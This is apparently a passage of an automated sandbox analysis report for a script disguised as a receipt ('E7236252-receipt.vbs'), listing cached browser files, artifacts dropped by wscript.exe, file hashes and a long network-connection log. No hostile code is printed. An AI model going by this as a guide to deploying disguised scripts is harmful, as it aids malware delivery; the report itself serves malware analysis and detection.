SHA-512:	149A1FB533C8C7D5EA363B80982DC1EC4C39E5EF9BB37E45BC80E105B18C3FA4DC610449BBD70DE9B9AC7339FEBBBD4FF76C2A9D1FD104D1943A386539AC4D44
Malicious:	false
URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.RS0dNtaZmo0.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTuhe2hCYlalU7rKCW-qT_-zMhVRaw"
Preview:	.gb_2e{background:rgba(60,64,67,.9);-webkit-border-radius:4px;border-radius:4px;color:#fff;font:500 12px "Roboto",arial,sans-serif;letter-spacing:.8px;line-height:16px;margin-top:4px;min-height:14px;padding:4px 8px;position:absolute;z-index:1000;-webkit-font-smoothing:antialiased}.gb_Fc{text-align:left}.gb_Fc>*{color:#bdc1c6;line-height:16px}.gb_Fc div:first-child{color:white}.gb_pa{background:none;border:1px solid transparent;-webkit-border-radius:50%;border-radius:50%;-webkit-box-sizing:border-box;box-sizing:border-box;cursor:pointer;height:40px;margin:8px;outline:none;padding:1px;position:absolute;right:0;top:0;width:40px}.gb_pa:hover{background-color:rgba(68,71,70,.08)}.gb_pa:focus,.gb_pa:active{background-color:rgba(68,71,70,.12)}.gb_pa:focus-visible{border-color:#0b57d0;outline:1px solid transparent;outline-offset:-1px}.gb_i .gb_pa:hover,.gb_i .gb_pa:focus,.gb_i .gb_pa:active{background-color:rgba(227,227,227,.08)}.gb_i .gb_pa:focus-visible{border-color:#a8c7fa}.gb_qa{-webkit-box

Chrome Cache Entry: 83

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	137077
Entropy (8bit):	5.441157262599399
Encrypted:	false
SSDEEP:	1536:jdGuEytn2zuFRDP6nWysx3DMqPKnrzNSpGiV1p+RHPGb4guj1O8jZRLM9rZxMkPr:D/noap3DTKnrQpG4nQUdud6ZxMkmwXd
MD5:	C4E2242848BE20829BF4D0A9DEC12680
SHA1:	48BFD17C43C7A0374FA7197C64A3F6D5CAA55CC9
SHA-256:	D5C9747FDDB9053EC2EA3B101E624963961027039F920B09F7EFE3E25686685B
SHA-512:	D9D56C659732958B0E7369D7A91FD33DB87ED666610683BEE40BAEEF98DB70980DF093A939CD33AA7CFCE13176065C8218BD4304F843BEE9BDC4FEEC402F8F73
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Qa gb_hb gb_Td gb_nd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Hd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_rd gb_kd gb_xd gb_wd\"\u003e\u003cdiv class\u003d\"gb_qd gb_gd\"\u003e\u003cdiv class\u003d\"gb_Oc gb_q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Oc gb_Rc gb_q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2124)
Category:	downloaded
Size (bytes):	121628
Entropy (8bit):	5.506662476672723
Encrypted:	false
SSDEEP:	3072:QI9yvwslCsrCF9f/U2Dj3Fkk7rEehA5L1kx:l9ygsrieDkVaL1kx
MD5:	F46ACD807A10216E6EEE8EA51E0F14D6
SHA1:	4702F47070F7046689432DCF605F11364BC0FBED
SHA-256:	D6B84873D27E7E83CF5184AAEF778F1CCB896467576CD8AF2CAD09B31B3C6086
SHA-512:	811263DC85C8DAA3A6E5D8A002CCCB953CD01E6A77797109835FE8B07CABE0DEE7EB126274E84266229880A90782B3B016BA034E31F0E3B259BF9E66CA797028
Malicious:	false
URL:	"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0"
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){("undefined"!==typeof globalThis?globalThis:"undefined"!==typeof self?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x20000, ]);.var ba,ca,da,na,pa,va,wa,za;ba=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ca="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.da=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.ma=da(this);na=function(a,b){if(b)a:{var c=_.ma;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ca(c,a,{configurable:!0,writable:!0,value:b})}};.na("Symbol",function(a){if(a)re

**\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON**

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	3.576313206984032
Encrypted:	false
SSDEEP:	3:NGh55I2Y1AnQqsl8lLn:smGQdqLn
MD5:	AD4154176576D4C6E074527CE60AC1DF
SHA1:	7173E0D4E76124BE83DAE6BA96151CD98F2FACC0
SHA-256:	5B71745AFCB35CCDEC890D15DE156BB91F9AD71B10C51C57A7523237A8074AEF
SHA-512:	B6C59408EC58A11EA500C07BC5DFDF0379F68FE5D81F29AC6F4C1549F67968D6B094C10731098C9785A1B91A1713518595C654E579C91AC0D6669255ACFA23FC
Malicious:	false
Preview:	....6.4.2.2.9.4.....\MAILSLOT\NET\GETDCD2009DBA.................

\Device\Mup\user-PC\PIPE\samr

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.438743916256937
Encrypted:	false
SSDEEP:	3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
MD5:	E467C82627F5E1524FDB4415AF19FC73
SHA1:	B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
SHA-256:	116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
SHA-512:	2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
Malicious:	false
Preview:	................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............

\Device\Mup\user-PC\PIPE\wkssvc

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.577654635909331
Encrypted:	false
SSDEEP:	3:rmHfvtH//Sy3yeM1y73yeUUGk+l91F3ye0Zty:rmHcy3HL73HNGFlXF3HIty
MD5:	86EFD27334586B592E7BFBD0E143C450
SHA1:	E8D1FF64BB20235FD4AF6D8051A4CD4A19B91BDE
SHA-256:	4AA9CA41BA628CDB8E337FCD8929F6BD8D68997E120A8C925BFA1C311AD7DFB4
SHA-512:	3FA13E0456C17D061B40F512CD5615F0B46F82E2095F82C0EB4D1D3E8DAF1ECE475028EB77C78C0FF91E034B745F3FD3C1F0C5AE87FBAEB69F67B1C69F547048
Malicious:	false
Preview:	...................................k...6.3F..~4Z.....]..........+.H`...........k...6.3F..~4Z....3.qq..7I......6...........k...6.3F..~4Z....,..l..@E............

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.415903266117122
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	E7236252-receipt.vbs
File size:	62'644 bytes
MD5:	b393a9fef1cb599ed7b36d715a05643c
SHA1:	74a3c10be06a8114d72aa0a2b7398472c66d1102
SHA256:	9f3ac57533a5bd81bfd29bca0561d9abb86a2c1a1c15e6d1727ff79be79c06b2
SHA512:	76c39fe9e0fc30f8d6d4e690eeb4071c245ad3d5dde28830f2f0292319612c1ca3cf0e9893c5b6ed28d9e0c5417fefca74e01196cdce1788db7680bc2676799b
SSDEEP:	384:FZAaML0zRi6yu4cnpMR8ZIRpurki6jM1L7Kc0ZCEXJg:7xzRNiR8ZIRgrkiq9ZxZg
TLSH:	B1537B526BEA2108B5F7BA48997A41344F37B9C5AD7DC94E05CC291D0BF3E84CC60BA7
File Content Preview:	..'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....'.....'. .C.o.p.y.r.i.g.h.t. .(.c.). .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n... .A.l.l. .r.i.g.h.t.s. .r

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2024 09:49:48.384565115 CEST	49671	443	192.168.2.3	204.79.197.203
May 4, 2024 09:49:51.822046041 CEST	49676	443	192.168.2.3	104.98.116.138
May 4, 2024 09:49:51.822046995 CEST	49677	443	192.168.2.3	104.98.116.138
May 4, 2024 09:49:51.822046995 CEST	49674	443	192.168.2.3	173.222.162.43
May 4, 2024 09:49:51.822050095 CEST	49675	443	192.168.2.3	104.98.116.155
May 4, 2024 09:49:51.853846073 CEST	49681	443	192.168.2.3	20.189.173.5
May 4, 2024 09:49:52.165868998 CEST	49681	443	192.168.2.3	20.189.173.5
May 4, 2024 09:49:52.212656021 CEST	49672	443	192.168.2.3	104.98.116.138
May 4, 2024 09:49:52.775115013 CEST	49681	443	192.168.2.3	20.189.173.5
May 4, 2024 09:49:53.196981907 CEST	49671	443	192.168.2.3	204.79.197.203
May 4, 2024 09:49:53.978234053 CEST	49681	443	192.168.2.3	20.189.173.5
May 4, 2024 09:49:56.384527922 CEST	49681	443	192.168.2.3	20.189.173.5
May 4, 2024 09:50:01.197000027 CEST	49681	443	192.168.2.3	20.189.173.5
May 4, 2024 09:50:01.431401968 CEST	49677	443	192.168.2.3	104.98.116.138
May 4, 2024 09:50:01.431402922 CEST	49676	443	192.168.2.3	104.98.116.138
May 4, 2024 09:50:01.431441069 CEST	49674	443	192.168.2.3	173.222.162.43
May 4, 2024 09:50:01.431443930 CEST	49675	443	192.168.2.3	104.98.116.155
May 4, 2024 09:50:01.822019100 CEST	49672	443	192.168.2.3	104.98.116.138
May 4, 2024 09:50:02.806471109 CEST	49671	443	192.168.2.3	204.79.197.203
May 4, 2024 09:50:03.204804897 CEST	443	49707	104.98.116.138	192.168.2.3
May 4, 2024 09:50:03.204926014 CEST	49707	443	192.168.2.3	104.98.116.138
May 4, 2024 09:50:10.806371927 CEST	49681	443	192.168.2.3	20.189.173.5
May 4, 2024 09:50:14.038463116 CEST	49710	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:14.038496971 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:14.038570881 CEST	49710	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:14.049530983 CEST	49710	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:14.049542904 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:14.349972963 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:14.350016117 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:14.350152969 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:14.351453066 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:14.351466894 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:14.377048969 CEST	49707	443	192.168.2.3	104.98.116.138
May 4, 2024 09:50:14.377146959 CEST	49707	443	192.168.2.3	104.98.116.138
May 4, 2024 09:50:14.538654089 CEST	443	49707	104.98.116.138	192.168.2.3
May 4, 2024 09:50:14.538672924 CEST	443	49707	104.98.116.138	192.168.2.3
May 4, 2024 09:50:14.687549114 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:14.687815905 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:14.730525017 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:14.730607033 CEST	49710	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:14.733756065 CEST	49710	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:14.733764887 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:14.734050989 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:14.750513077 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:14.750533104 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:14.750792980 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:14.751085997 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:14.752657890 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:14.796123028 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:14.823982000 CEST	49710	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:14.864119053 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.387368917 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.387392044 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.387398958 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.387435913 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.387453079 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.387463093 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.387480974 CEST	49710	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:15.387507915 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.387525082 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.387538910 CEST	49710	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:15.387545109 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.387552023 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.387564898 CEST	49710	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:15.387573004 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.387599945 CEST	49710	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:15.387634039 CEST	49710	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:15.399607897 CEST	49710	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:15.399630070 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.399641037 CEST	49710	443	192.168.2.3	20.12.23.50
May 4, 2024 09:50:15.399646044 CEST	443	49710	20.12.23.50	192.168.2.3
May 4, 2024 09:50:15.677572012 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:15.677609921 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:15.677649021 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:15.677675009 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:15.677695990 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:15.677696943 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:15.677711010 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:15.677736044 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:15.677755117 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:15.677762032 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:15.677771091 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:15.677798986 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:15.678515911 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:15.678622961 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:15.678678036 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:15.678683996 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:15.678708076 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:15.678757906 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:15.695555925 CEST	49712	443	192.168.2.3	104.20.3.235
May 4, 2024 09:50:15.695573092 CEST	443	49712	104.20.3.235	192.168.2.3
May 4, 2024 09:50:21.027468920 CEST	49716	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.027513981 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.027596951 CEST	49716	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.027848005 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.027884960 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.027936935 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.028251886 CEST	49718	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.028280020 CEST	443	49718	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.028330088 CEST	49718	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.028441906 CEST	49719	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.028470993 CEST	443	49719	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.028563976 CEST	49719	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.028991938 CEST	49719	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.029006958 CEST	443	49719	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.029170990 CEST	49718	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.029184103 CEST	443	49718	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.029360056 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.029373884 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.029555082 CEST	49716	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.029573917 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.360369921 CEST	443	49718	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.362813950 CEST	443	49719	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.362868071 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.365932941 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.489929914 CEST	49716	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.489948034 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.491137981 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.491153002 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.491224051 CEST	49716	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.498112917 CEST	49716	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.498178959 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.498430014 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.498456001 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.498605967 CEST	49719	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.498630047 CEST	443	49719	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.499572039 CEST	49718	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.499589920 CEST	443	49718	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.499617100 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.499630928 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.499663115 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.499697924 CEST	443	49719	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.499715090 CEST	443	49719	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.499761105 CEST	49719	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.500639915 CEST	443	49718	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.500650883 CEST	443	49718	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.500696898 CEST	49718	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.504034996 CEST	49719	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.504108906 CEST	443	49719	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.504358053 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.504421949 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.506459951 CEST	49718	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.506563902 CEST	443	49718	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.508009911 CEST	49716	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.508023024 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.531064987 CEST	49719	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.531083107 CEST	443	49719	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.531622887 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.531630993 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.532200098 CEST	49718	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.532210112 CEST	443	49718	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.549930096 CEST	49716	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.655222893 CEST	49718	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.702533960 CEST	49719	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.702560902 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.712141991 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.712148905 CEST	443	49719	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.712182999 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.712224007 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.712264061 CEST	443	49719	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.712282896 CEST	49716	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.712296009 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.712356091 CEST	49719	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.712940931 CEST	443	49718	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.712974072 CEST	49716	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.713038921 CEST	443	49718	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.714323997 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.714375019 CEST	443	49716	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.714390039 CEST	49718	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.714422941 CEST	49716	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.726996899 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.727040052 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.727091074 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.727102995 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.727125883 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.727252960 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.729271889 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.740607023 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.740638971 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.740695953 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.740704060 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.740746021 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.751537085 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.762732029 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.762753963 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.762805939 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.762813091 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.762851954 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.886013985 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.891469955 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.891490936 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.891592979 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.891611099 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.891653061 CEST	49717	443	192.168.2.3	142.250.68.68
May 4, 2024 09:50:21.902627945 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.913717031 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.913741112 CEST	443	49717	142.250.68.68	192.168.2.3
May 4, 2024 09:50:21.913783073 CEST	49717	443	192.168.2.3	142.250.68.68
